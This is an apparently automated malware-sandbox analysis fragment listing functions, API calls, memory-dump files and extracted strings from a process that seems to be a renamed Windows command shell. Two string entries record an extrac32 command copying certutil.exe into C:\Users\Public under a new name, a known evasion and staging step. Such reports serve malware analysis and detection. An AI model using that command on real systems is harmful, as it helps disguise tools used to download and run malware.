                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB13D401
                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB13D41B
                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB13D435
                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB13D480
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                                          • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                          • API String ID: 3964947564-518410914
                                                                                                          • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                          • Instruction ID: 01f0b7dc2bddbf7a9127ce499b9c4e6f806935b85e3d70ea7b135fd0036b164c
                                                                                                          • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                          • Instruction Fuzzy Hash: 66026A21A0B602C6EB5ABB29F854278E7A0FF4975CFD24635D90E432B4EF3DA414C661
                                                                                                          Function 00007FF7AB1302A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp$iswspacewcschr
                                                                                                          • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                          • API String ID: 840959033-3627297882
                                                                                                          • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                          • Instruction ID: cbd77aeebffe935650d1445d81cf0e8014d6cf53302a10adf8725e2971626607
                                                                                                          • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                          • Instruction Fuzzy Hash: CCD16A21A0A603C6FA9ABB28F4552B9A7A0BF44B4CFD64035D54E472B5EF3CE5488770
                                                                                                          Function 00007FF7AB13081C Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 130COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp$EnvironmentVariable
                                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                          • API String ID: 198002717-267741548
                                                                                                          • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                          • Instruction ID: 0c8f972cece2aa3c170077d63e7f45d57bc5834901acecf6befa7d7d5e343c88
                                                                                                          • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                          • Instruction Fuzzy Hash: 1A514F21A0A64286F6556B1DF854279FA90BF49B88FD69175C94E03678EF3CE0488360
                                                                                                          Function 00007FF7AB12EF40 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 465COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7AB12E626,?,?,00000000,00007FF7AB131F69), ref: 00007FF7AB12F000
                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F031
                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F0D6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: iswdigitiswspacewcschr
                                                                                                          • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                                          • API String ID: 1595556998-2755026540
                                                                                                          • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                          • Instruction ID: 1870dbb0b25e24ca83d9c094d5b22b03a32a59e301fa8cb2419b7669c19a9978
                                                                                                          • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                          • Instruction Fuzzy Hash: DB22A665E0A656C1FA667B1DF45027AE7A0BF05B9CFC24232D98D422F4DF3CA4418BB1
                                                                                                          Function 00007FF7AB12D3F0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 310memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                                          • String ID: "$=,;
                                                                                                          • API String ID: 3545743878-4143597401
                                                                                                          • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                          • Instruction ID: 4b8e6a581885ae599b69257fa53de78db3b690aa0722705da2992bad004a81d5
                                                                                                          • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                          • Instruction Fuzzy Hash: 2DC16E65E0A752C2EB666B19F000379F6A1FF49F4CF969535CA5E033B4EF3CA4558220
                                                                                                          Function 00007FF7AB145BF4 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 153windowthreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentFormatMessageThread
                                                                                                          • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                          • API String ID: 2411632146-3173542853
                                                                                                          • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                          • Instruction ID: 9b78d5002aba438a240acff03f1573acac0dc6a93240a4af8df302609cc6ce53
                                                                                                          • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                          • Instruction Fuzzy Hash: AF616EB1A0A64281EA26EF59F5446B5E7A4FF44B8CFC60136DA4D13778EF3DE5408720
                                                                                                          Function 00007FF7AB1326E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile_open_osfhandle
                                                                                                          • String ID: con
                                                                                                          • API String ID: 2905481843-4257191772
                                                                                                          • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                          • Instruction ID: bde267dc46d48ffbdd9cb0ca24ac719aa8791bb5cef00da066818c02bd16ac25
                                                                                                          • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                          • Instruction Fuzzy Hash: AE71E9326096818AE762AF1CF440279F690FB4AB68F914334DA6E437B4EF3CD549CB10
                                                                                                          Function 00007FF7AB1493E8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 3829876242-3916222277
                                                                                                          • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                                          • Instruction ID: 7d70dc850457491f94122b8e32fd4bb32d78e782e0ea171d13f2f0d496277b09
                                                                                                          • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                                          • Instruction Fuzzy Hash: F8619422A066428AE616AF19F454179F7A1FF89B98F86D234DE0E077B4FF3CE5058710
                                                                                                          Function 00007FF7AB151A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                          • String ID: CSVFS$NTFS$REFS
                                                                                                          • API String ID: 3510147486-2605508654
                                                                                                          • Opcode ID: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                                                                          • Instruction ID: 1731e140f8bf1dcf85007dc00e6f2f9e1878d0dec96b8fe6c35e1f30ab3d5c33
                                                                                                          • Opcode Fuzzy Hash: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                                                                          • Instruction Fuzzy Hash: 22616332705BC28AEB669F29E8843E9B7A4FB45B49F854139CA0E4B778DF78D104C710
                                                                                                          Function 00007FF7AB1272B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • longjmp.MSVCRT(?,00000000,00000000,00007FF7AB127279,?,?,?,?,?,00007FF7AB12BFA9), ref: 00007FF7AB144485
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: longjmp
                                                                                                          • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                          • API String ID: 1832741078-366822981
                                                                                                          • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                          • Instruction ID: eb9c5839559ce4c79cab41ad6ee8e3180e72304171eb615e809967d33161eb89
                                                                                                          • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                          • Instruction Fuzzy Hash: 67C1B5A4F0E642C1E626FB1DF1905B9D391AB46B8CFD20032CD0E576B2DF2CA9468360
                                                                                                          Function 00007FF7AB12B998 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 275COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB12CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDA6
                                                                                                            • Part of subcall function 00007FF7AB12CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDBD
                                                                                                          • memset.MSVCRT ref: 00007FF7AB12BA2B
                                                                                                          • wcschr.MSVCRT ref: 00007FF7AB12BA8A
                                                                                                          • wcschr.MSVCRT ref: 00007FF7AB12BAAA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heapwcschr$AllocProcessmemset
                                                                                                          • String ID: -$:.\$=,;$=,;+/[] "
                                                                                                          • API String ID: 2872855111-969133440
                                                                                                          • Opcode ID: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                                                          • Instruction ID: 91af18aa1b5f12ff6d5f6ba223f97fa847e545f2acb0830da42af62c009d0956
                                                                                                          • Opcode Fuzzy Hash: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                                                          • Instruction Fuzzy Hash: 35B18226A0E642C1EA66AB1DF1C427AE690FF44B98FC74235CA5E437B4DF3DE4459320
                                                                                                          Function 00007FF7AB12FC30 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 311memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                                          • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                          • API String ID: 1606811317-2340392073
                                                                                                          • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                          • Instruction ID: 0b012d0c77d824589ceca6df754b02bcd46a2b1501e2e1f0570f6ddfc5952729
                                                                                                          • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                          • Instruction Fuzzy Hash: 59D1BF21A0AA4682EB56AB1CF8142B9A7A0FF45B9CFC64231DE5D437B4DF3CE415C760
                                                                                                          Function 00007FF7AB1503AC Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$ErrorLast$InformationVolume
                                                                                                          • String ID: %04X-%04X$~
                                                                                                          • API String ID: 2748242238-2468825380
                                                                                                          • Opcode ID: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                                                                          • Instruction ID: 8d6f34be8a24cf2cbd5a1aed1727df300132b9da88ea475e6a3e8d1fea724469
                                                                                                          • Opcode Fuzzy Hash: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                                                                          • Instruction Fuzzy Hash: C5A1B532709BC1CAEB669F28E8442E9B7A1FB85788F818135DA4D4B778DF3CD6458710
                                                                                                          Function 00007FF7AB13662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF7AB136570,?,?,?,?,?,?,00000000,00007FF7AB136488), ref: 00007FF7AB136677
                                                                                                          • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7AB136570,?,?,?,?,?,?,00000000,00007FF7AB136488), ref: 00007FF7AB13668F
                                                                                                          • _errno.MSVCRT ref: 00007FF7AB1366A3
                                                                                                          • wcstol.MSVCRT ref: 00007FF7AB1366C4
                                                                                                          • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7AB136570,?,?,?,?,?,?,00000000,00007FF7AB136488), ref: 00007FF7AB1366E4
                                                                                                          • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF7AB136570,?,?,?,?,?,?,00000000,00007FF7AB136488), ref: 00007FF7AB1366FE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
